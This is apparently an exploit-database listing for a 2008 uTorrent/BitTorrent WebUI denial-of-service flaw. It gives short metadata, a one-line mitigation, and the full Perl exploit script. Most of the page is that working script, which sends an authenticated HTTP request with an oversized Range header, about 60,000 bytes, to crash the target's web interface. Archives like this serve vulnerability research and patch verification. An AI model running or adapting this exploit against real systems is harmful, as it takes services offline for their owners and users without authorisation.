header-logo
Suggest Exploit
vendor:
WebIU
by:
Exodus
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: WebIU
Affected Version From: 1.7.7/6.0.1
Affected Version To: 1.7.7/6.0.1
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit

This exploit sends a malicious payload to the target host using the Range header in an HTTP request. This payload is designed to cause a denial of service on the target host.

Mitigation:

Ensure that the target host is running the latest version of uTorrent / BitTorrent WebIU and that all security patches are up to date.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# uTorrent / BitTorrent  WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit
# according to the following advisory: http://secunia.com/advisories/30605
#
# usage: WebUI-dos.pl <url> <port> <user:pass>
# Exploit written by Exodus.
# http://www.blackhat.org.il

use IO::Socket;
use MIME::Base64;

if(@ARGV < 3)
{ &usage; }

($host,$ref) = split(/\//,$ARGV[0]);

$sock = IO::Socket::INET->new(PeerAddr => "$host:$ARGV[1]", Proto =>'TCP') || die("[X]Couldnt connect to host: $host:$ARGV[1]\n");
$buff = "E" x 60000;
$up = encode_base64($ARGV[2]);
chomp($up);

print $sock "GET /gui/common.js HTTP/1.1\r\n".
"Host: $host\r\n".
"Authorization: Basic $up\r\n".
"Range: bytes=$buff\r\n".
"Connection: close\r\n\r\n";

close($sock);

print "[!]Payload sent, WebUI should be down...\n";



sub usage
{
	print "usage $0 <url> <port> <user:pass>\n".
		  "ex: $0 127.0.0.1/gui/common.js 1337 admin:admin\n";
	exit;
}

# milw0rm.com [2008-06-23]